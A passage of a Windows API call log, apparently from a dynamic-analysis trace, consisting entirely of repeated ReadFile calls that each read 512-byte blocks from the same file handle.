lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.747] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.747] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.747] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.747] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.747] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.747] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.747] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.747] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.747] ReadFile 
(in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.748] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.748] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.748] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.748] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.748] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.748] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.748] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.748] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 
[0147.748] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.748] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.748] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.748] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.749] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.749] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.749] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.749] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.749] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, 
lpOverlapped=0x0) returned 1 [0147.749] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.749] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.749] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.749] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.749] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.749] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.749] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.749] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.750] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, 
lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.750] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.750] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.750] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.750] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.750] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.750] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.750] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.750] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.750] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: 
lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.750] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.750] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.750] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.751] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.751] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.751] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.751] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.751] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.751] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, 
lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.751] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.751] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.751] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.751] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.751] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.751] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.752] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.752] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.752] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.752] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.752] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.752] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.752] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.752] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.752] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.752] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.753] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.753] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.753] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.753] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.753] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.753] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.753] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.753] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.753] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.753] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.753] ReadFile (in: hFile=0x58, 
lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.754] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.754] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.754] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.754] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.754] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.754] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.754] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.754] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.754] ReadFile 
(in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.754] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.754] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.754] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.755] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.755] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.755] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.755] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.755] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 
[0147.755] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.755] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.755] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.755] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.755] 